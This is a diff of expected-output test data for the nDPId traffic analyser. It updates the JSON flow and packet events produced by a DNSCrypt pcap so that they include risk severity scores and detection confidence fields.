-00629{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":315,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":58740,"dst_port":2053,"l4_proto":"udp","ndpi": {"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":315,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":132,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317462,"flow_last_seen":946739317462,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317462,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":58740,"dst_port":2053,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00709{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":316,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":2,"flow_last_seen":946739317463,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"ts_msec":946739317463,"pkt":"ZmZmZmZmRERERERECABFAADcYmkAADoRvwewOO2rCgAAAQG7v3AAyNgssmOBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlyZXNvbHZlcjEIZG5zY3J5cHQCZXUAABAAAcAMABAAAQAAAAAAfXxETlNDAAIAABl3+ykQSZujAz2k88UgiWZ8EW8WsV\/cZTbX4vJmZY7W5pQMpzujkuwlfjXc+3bckBxwziAxuzLgEVuJhZegpADIiVqOfVhh6bINcwjX2cKXslxwpVLP3wwY1fcQglCKacmJWo59WGHpX1OncV9Tp3FfVPjx"}
 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":317,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":129,"flow_packet_id":2,"flow_last_seen":946739317493,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"ts_msec":946739317493,"pkt":"ZmZmZmZmRERERERECABFAADUfxoAADgRxYuy2MneCgAAAQgFz30AwELIfSWBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlzb2x0eXNpYWsDY29tAAAQAAHADAAQAAEAAAAAAH18RE5TQwABAACUEmW5IqEpBOIJ6OaaARxYZGtpF\/IlhAtf26qHIkb2CzdApz2tTrsIcpPG9I9VOY64aWiKVSPR4fI2Zci4AowMZh1rbmzrBh4Ds7P4I2QNBDqhYpufqNWKNKJm6\/BuBFZmHWtubOsGHl9TOclfUznJX1SLSQ=="}
 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":318,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":127,"flow_packet_id":2,"flow_last_seen":946739317493,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"ts_msec":946739317493,"pkt":"ZmZmZmZmRERERERECABFAADUfxkAADgRxYyy2MneCgAAAQgF6rsAwCeIfSeBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlzb2x0eXNpYWsDY29tAAAQAAHADAAQAAEAAAAAAH18RE5TQwABAACUEmW5IqEpBOIJ6OaaARxYZGtpF\/IlhAtf26qHIkb2CzdApz2tTrsIcpPG9I9VOY64aWiKVSPR4fI2Zci4AowMZh1rbmzrBh4Ds7P4I2QNBDqhYpufqNWKNKJm6\/BuBFZmHWtubOsGHl9TOclfUznJX1SLSQ=="}
@@ -659,24 +659,24 @@
 00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":322,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":132,"flow_packet_id":2,"flow_last_seen":946739317496,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":226,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":226,"pkt_l4_len":192,"ts_msec":946739317496,"pkt":"ZmZmZmZmRERERERECABFAADUfxwAADgRxYmy2MneCgAAAQgF5XQAwCzTfSOBgAABAAEAAAAAATINZG5zY3J5cHQtY2VydAlzb2x0eXNpYWsDY29tAAAQAAHADAAQAAEAAAAAAH18RE5TQwABAACUEmW5IqEpBOIJ6OaaARxYZGtpF\/IlhAtf26qHIkb2CzdApz2tTrsIcpPG9I9VOY64aWiKVSPR4fI2Zci4AowMZh1rbmzrBh4Ds7P4I2QNBDqhYpufqNWKNKJm6\/BuBFZmHWtubOsGHl9TOclfUznJX1SLSQ=="}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":323,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43224,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":323,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":133,"flow_packet_id":1,"flow_last_seen":946739317496,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739317496,"pkt":"REREREREZmZmZmZmCABFAAIcbsxAAL0R7dwKAAABLUxxH6jYAbsCCGFBZBkBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43224,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":323,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43224,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":324,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":55267,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":324,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":134,"flow_packet_id":1,"flow_last_seen":946739317496,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739317496,"pkt":"REREREREZmZmZmZmCABFAAXcbs0gAL0RChwKAAABLUxxH9fjAbsGBNdkZBYBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00686{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":55267,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00795{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":324,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":55267,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":325,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739317496,"pkt":"REREREREZmZmZmZmCABFAABQbs0Aub0RLu8KAAABLUxxHwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":325,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":326,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":51589,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":326,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":946739317496,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739317496,"pkt":"REREREREZmZmZmZmCABFAAIcbs5AAL0R7doKAAABLUxxH8mFAbsCCGFBZBcBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":51589,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":326,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":51589,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":327,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43776,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":327,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":946739317496,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739317496,"pkt":"REREREREZmZmZmZmCABFAAIcbs9AAL0R7dkKAAABLUxxH6sAAbsCCGFBZBUBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAAAcgADAHEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00682{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":327,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43776,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":327,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":43776,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":328,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":137,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739317496,"flow_last_seen":946739317496,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739317496,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":59707,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":328,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":137,"flow_packet_id":1,"flow_last_seen":946739317496,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739317496,"pkt":"REREREREZmZmZmZmCABFAAXcbtAgAL0RChkKAAABLUxxH+k7AbsGBMYOZBQBAAABAAAAAAABATINZG5zY3J5cHQtY2VydANkbnMEc2VieQJpbwAAEAABAAAAAAAAAAAABcQADAXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA